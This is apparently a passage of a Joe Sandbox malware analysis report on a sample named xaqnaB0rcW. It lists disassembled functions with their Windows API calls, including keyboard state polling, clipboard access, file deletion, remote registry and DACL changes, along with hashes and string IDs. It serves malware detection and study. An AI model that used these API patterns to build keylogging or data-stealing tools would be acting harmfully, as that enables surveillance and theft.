                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                  • String ID:
                                                                  • API String ID: 3222323430-0
                                                                  • Opcode ID: abfc162f031ce420653f2fbe79eefe77f43ffb20c9dd6282d90359f1da6e9046
                                                                  • Instruction ID: 1e19f3bac58b298a09869a9cdb9ab2dfe1332bd9ee910d89de763dbf909f8e05
                                                                  • Opcode Fuzzy Hash: abfc162f031ce420653f2fbe79eefe77f43ffb20c9dd6282d90359f1da6e9046
                                                                  • Instruction Fuzzy Hash: 3851AE31201301ABD303AF65ED56F6E77ACEB85B11F05042AF946DA1E1DF70D909CBA2
                                                                  Function 0039F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0039F62B
                                                                  • FindClose.KERNEL32(00000000), ref: 0039F67F
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0039F6A4
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0039F6BB
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0039F6E2
                                                                  • __swprintf.LIBCMT ref: 0039F72E
                                                                  • __swprintf.LIBCMT ref: 0039F767
                                                                  • __swprintf.LIBCMT ref: 0039F7BB
                                                                    • Part of subcall function 0037172B: __woutput_l.LIBCMT ref: 00371784
                                                                  • __swprintf.LIBCMT ref: 0039F809
                                                                  • __swprintf.LIBCMT ref: 0039F858
                                                                  • __swprintf.LIBCMT ref: 0039F8A7
                                                                  • __swprintf.LIBCMT ref: 0039F8F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                  • API String ID: 835046349-2428617273
                                                                  • Opcode ID: 1e8d91cfb632c33f74dd4fd470649092dfd94473aac8926c6759c837e44f3106
                                                                  • Instruction ID: fe75458312bd6a634bc7754b334812133155cd0ed92255c231cb378635c78b24
                                                                  • Opcode Fuzzy Hash: 1e8d91cfb632c33f74dd4fd470649092dfd94473aac8926c6759c837e44f3106
                                                                  • Instruction Fuzzy Hash: 42A10FB2418344AFC716EBA4C885DAFB7ECAF98705F404C2EB585C6191EB34D949C762
                                                                  Function 003A1B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 003A1B50
                                                                  • _wcscmp.LIBCMT ref: 003A1B65
                                                                  • _wcscmp.LIBCMT ref: 003A1B7C
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 003A1B8E
                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 003A1BA8
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 003A1BC0
                                                                  • FindClose.KERNEL32(00000000), ref: 003A1BCB
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 003A1BE7
                                                                  • _wcscmp.LIBCMT ref: 003A1C0E
                                                                  • _wcscmp.LIBCMT ref: 003A1C25
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003A1C37
                                                                  • SetCurrentDirectoryW.KERNEL32(004039FC), ref: 003A1C55
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A1C5F
                                                                  • FindClose.KERNEL32(00000000), ref: 003A1C6C
                                                                  • FindClose.KERNEL32(00000000), ref: 003A1C7C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                  • String ID: *.*
                                                                  • API String ID: 1803514871-438819550
                                                                  • Opcode ID: 6a570037120bf75c2372a552789c8eae08060b448b1521cc7b156ed00dd27795
                                                                  • Instruction ID: 316ec6bcec7ba9873365104a7884eb9eadb2c8c975e1eebf5ffd18e02fe9e97a
                                                                  • Opcode Fuzzy Hash: 6a570037120bf75c2372a552789c8eae08060b448b1521cc7b156ed00dd27795
                                                                  • Instruction Fuzzy Hash: 9D31F3725412296FCF26AFB4EC49AEE77ACDF06330F1041A6F815E7090EB74DA458A64
                                                                  Function 003A1C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 003A1CAB
                                                                  • _wcscmp.LIBCMT ref: 003A1CC0
                                                                  • _wcscmp.LIBCMT ref: 003A1CD7
                                                                    • Part of subcall function 00396BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00396BEF
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 003A1D06
                                                                  • FindClose.KERNEL32(00000000), ref: 003A1D11
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 003A1D2D
                                                                  • _wcscmp.LIBCMT ref: 003A1D54
                                                                  • _wcscmp.LIBCMT ref: 003A1D6B
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003A1D7D
                                                                  • SetCurrentDirectoryW.KERNEL32(004039FC), ref: 003A1D9B
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A1DA5
                                                                  • FindClose.KERNEL32(00000000), ref: 003A1DB2
                                                                  • FindClose.KERNEL32(00000000), ref: 003A1DC2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                  • String ID: *.*
                                                                  • API String ID: 1824444939-438819550
                                                                  • Opcode ID: bfc4c9d705f08a0c9bc0d3688f973c57b279b2f0ad7ede56cea5d0ca38078698
                                                                  • Instruction ID: c5cc8b09d99ae2f756d4ab3e9840b195228e043e87549703df2e8311c83e93f5
                                                                  • Opcode Fuzzy Hash: bfc4c9d705f08a0c9bc0d3688f973c57b279b2f0ad7ede56cea5d0ca38078698
                                                                  • Instruction Fuzzy Hash: F431023250161A6FCF22AFB4EC09AEE3BACDF06324F114562F801A70D1DB74DE458B64
                                                                  Function 00357D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _memset
                                                                  • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                  • API String ID: 2102423945-2023335898
                                                                  • Opcode ID: 815db761b923d6f95491a6c10ef28e740bb3aa65befb7b2fd1e5f7785568e271
                                                                  • Instruction ID: 0123f5a7cf9605bee58d24036a0707a2511292e4cb01981e13c13989c1b51d12
                                                                  • Opcode Fuzzy Hash: 815db761b923d6f95491a6c10ef28e740bb3aa65befb7b2fd1e5f7785568e271
                                                                  • Instruction Fuzzy Hash: A382B171D04219CFCB26CF94C881BADB7B2FF49310F25816AD859AB361E7749D85CB90
                                                                  Function 003A091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(?), ref: 003A09DF
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 003A09EF
                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003A09FB
                                                                  • __wsplitpath.LIBCMT ref: 003A0A59
                                                                  • _wcscat.LIBCMT ref: 003A0A71
                                                                  • _wcscat.LIBCMT ref: 003A0A83
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003A0A98
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003A0AAC
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003A0ADE
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003A0AFF
                                                                  • _wcscpy.LIBCMT ref: 003A0B0B
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003A0B4A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                  • String ID: *.*
                                                                  • API String ID: 3566783562-438819550
                                                                  • Opcode ID: 5cddfb0c2c767cf630f764941bbee745a24f7817db20827084a4e030bc900c03
                                                                  • Instruction ID: b78797ed92432fca1cfbd3415c3b9d822a5169f4dc316672a71a1fe4f541edb4
                                                                  • Opcode Fuzzy Hash: 5cddfb0c2c767cf630f764941bbee745a24f7817db20827084a4e030bc900c03
                                                                  • Instruction Fuzzy Hash: 1B6147725043059FD716EF60C8859AEB3E8FF89310F04891EF9899B261DB35E949CB92
                                                                  Function 00356F07 Relevance: 22.1, Strings: 17, Instructions: 883COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ?$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$ICTRLCREATETREEVIEW$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$??? ?
                                                                  • API String ID: 0-1480269787
                                                                  • Opcode ID: 4bf1d49737fbdc4fdf2e214178bf31536d7dc4253648cd6dc9335daca42d7de0
                                                                  • Instruction ID: c6e96e47cd84fa70a7b6353a74b438039769ddb8dca26ff56c453270447350b2
                                                                  • Opcode Fuzzy Hash: 4bf1d49737fbdc4fdf2e214178bf31536d7dc4253648cd6dc9335daca42d7de0
                                                                  • Instruction Fuzzy Hash: 7672A172E04219CBDB26CF59E880BAEB7B5FF54310F15816AE805EB390DB309E45DB90
                                                                  Function 0038A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0038ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0038ABD7
                                                                    • Part of subcall function 0038ABBB: GetLastError.KERNEL32(?,0038A69F,?,?,?), ref: 0038ABE1
                                                                    • Part of subcall function 0038ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0038A69F,?,?,?), ref: 0038ABF0
                                                                    • Part of subcall function 0038ABBB: HeapAlloc.KERNEL32(00000000,?,0038A69F,?,?,?), ref: 0038ABF7
                                                                    • Part of subcall function 0038ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0038AC0E
                                                                    • Part of subcall function 0038AC56: GetProcessHeap.KERNEL32(00000008,0038A6B5,00000000,00000000,?,0038A6B5,?), ref: 0038AC62
                                                                    • Part of subcall function 0038AC56: HeapAlloc.KERNEL32(00000000,?,0038A6B5,?), ref: 0038AC69
                                                                    • Part of subcall function 0038AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0038A6B5,?), ref: 0038AC7A
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0038A6D0
                                                                  • _memset.LIBCMT ref: 0038A6E5
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0038A704
                                                                  • GetLengthSid.ADVAPI32(?), ref: 0038A715
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0038A752
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0038A76E
                                                                  • GetLengthSid.ADVAPI32(?), ref: 0038A78B
                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0038A79A
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0038A7A1
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0038A7C2
                                                                  • CopySid.ADVAPI32(00000000), ref: 0038A7C9
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0038A7FA
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0038A820
                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0038A834
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                  • String ID:
                                                                  • API String ID: 3996160137-0
                                                                  • Opcode ID: 6fb22a2d412affcf821e78df86535e69f8836c5634f3570d6e908f9c29ad87db
                                                                  • Instruction ID: d834c916c47d2e0556981011d95b4174af5eb97e094d890c2e8c1c35836f505a
                                                                  • Opcode Fuzzy Hash: 6fb22a2d412affcf821e78df86535e69f8836c5634f3570d6e908f9c29ad87db
                                                                  • Instruction Fuzzy Hash: 03514071901609AFEF12DFA5DC44EEEBBB9FF44300F04816AF915AB250D7349A05CB61
                                                                  Function 003963F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00396EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00395FA6,?), ref: 00396ED8
                                                                    • Part of subcall function 003972CB: GetFileAttributesW.KERNEL32(?,00396019), ref: 003972CC
                                                                  • _wcscat.LIBCMT ref: 00396441
                                                                  • __wsplitpath.LIBCMT ref: 0039645F
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00396474
                                                                  • _wcscpy.LIBCMT ref: 003964A3
                                                                  • _wcscat.LIBCMT ref: 003964B8
                                                                  • _wcscat.LIBCMT ref: 003964CA
                                                                  • DeleteFileW.KERNEL32(?), ref: 003964DA
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 003964EB
                                                                  • FindClose.KERNEL32(00000000), ref: 00396506
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                  • String ID: \*.*
                                                                  • API String ID: 2643075503-1173974218
                                                                  • Opcode ID: 7d1e910989eb067094098bd7d510f28d14c7ea929d9af816024b923dc2695697
                                                                  • Instruction ID: 43e46254ecc2a1697653573e69422c3885463e153cd0bc04e5581d11ade29288
                                                                  • Opcode Fuzzy Hash: 7d1e910989eb067094098bd7d510f28d14c7ea929d9af816024b923dc2695697
                                                                  • Instruction Fuzzy Hash: E93181B2409384AAC732DBE48885EDBB7DCAF56310F44492EF5D8C7141EA35E50987A7
                                                                  Function 003B31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003B3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003B2BB5,?,?), ref: 003B3C1D
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003B328E
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003B332D
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003B33C5
                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003B3604
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 003B3611
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 1240663315-0
                                                                  • Opcode ID: 5923b8d5e973bf8e7e10a91b84f2c857306e614e8330b632c855ffdd930e5f39
                                                                  • Instruction ID: d7b00b450672b5d93dcec7acf71ced89e22236419cec9d34c537fe11335771bc
                                                                  • Opcode Fuzzy Hash: 5923b8d5e973bf8e7e10a91b84f2c857306e614e8330b632c855ffdd930e5f39
                                                                  • Instruction Fuzzy Hash: 3EE16E35604210AFCB16DF29C895E6EBBE8EF89314F04896DF94ADB261DB30ED05CB51
                                                                  Function 00392B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 00392B5F
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00392BE0
                                                                  • GetKeyState.USER32(000000A0), ref: 00392BFB
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00392C15
                                                                  • GetKeyState.USER32(000000A1), ref: 00392C2A
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00392C42
                                                                  • GetKeyState.USER32(00000011), ref: 00392C54
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00392C6C
                                                                  • GetKeyState.USER32(00000012), ref: 00392C7E
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00392C96
                                                                  • GetKeyState.USER32(0000005B), ref: 00392CA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: ec1cb9efa121e1231e4cafbb934ee76a07c541537cfdd0a9a8e167a0bc39331b
                                                                  • Instruction ID: 640702954e167ed04eaebd284eb6a29cf8b778f2055d18e20cef879d3add99bc
                                                                  • Opcode Fuzzy Hash: ec1cb9efa121e1231e4cafbb934ee76a07c541537cfdd0a9a8e167a0bc39331b
                                                                  • Instruction Fuzzy Hash: E341A834904FCA7DFF379B6498043ABBFE56B11344F09409AD9C6562C2DB949DC8CBA2
                                                                  Function 003A6D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                  • String ID:
                                                                  • API String ID: 1737998785-0
                                                                  • Opcode ID: 09b0219780dd56f957ec995886e22d4bef817c4ed6214d9cb37be43d0e692e4d
                                                                  • Instruction ID: b0097fdd61729a33e9701195d53d59973c8112dcaf797b2a4dc9ad0ed04c833f
                                                                  • Opcode Fuzzy Hash: 09b0219780dd56f957ec995886e22d4bef817c4ed6214d9cb37be43d0e692e4d
                                                                  • Instruction Fuzzy Hash: 72219C31301610AFDB13AF64EC4AB6E77ACFF45751F05841AF90ADB2A1CB34E9008B94
                                                                  Function 003AC18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00389ABF: CLSIDFromProgID.OLE32 ref: 00389ADC
                                                                    • Part of subcall function 00389ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00389AF7
                                                                    • Part of subcall function 00389ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00389B05
                                                                    • Part of subcall function 00389ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00389B15
                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 003AC235
                                                                  • _memset.LIBCMT ref: 003AC242
                                                                  • _memset.LIBCMT ref: 003AC360
                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 003AC38C
                                                                  • CoTaskMemFree.OLE32(?), ref: 003AC397
                                                                  Strings
                                                                  • NULL Pointer assignment, xrefs: 003AC3E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                  • String ID: NULL Pointer assignment
                                                                  • API String ID: 1300414916-2785691316
